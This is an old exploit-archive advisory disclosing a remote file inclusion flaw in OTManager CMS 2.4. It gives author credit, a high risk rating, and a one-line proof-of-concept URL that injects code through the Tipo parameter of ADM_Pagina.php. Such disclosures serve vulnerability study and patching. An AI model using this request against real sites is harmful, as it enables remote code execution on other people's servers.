[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : OTManager CMS 2.4 (Tipo) Remote File Inclusion Vulnerability
# Published : 2008-11-10
# Author : Colt7r
# Previous Title : Collabtive 0.4.8 (XSS/Auth Bypass/Upload) Multiple Vulnerabilities
# Next Title : Joomla Component JooBlog 0.1.1 (PostID) SQL Injection Vulnerability


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

  OTManager 2.4 Remote File Inclusion (RFI) Vulnerability

  - Security flaw discovered by Colt7r
  - CONTACT: colt7r |@| bsdmail.org

  - Affected Software: OTManager 2.4
  - Risk: HIGH
  - Exploit: http://host/Admin/ADM_Pagina.php?Tipo=[EVIL CODE]

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# www.Syue.com [2008-11-10]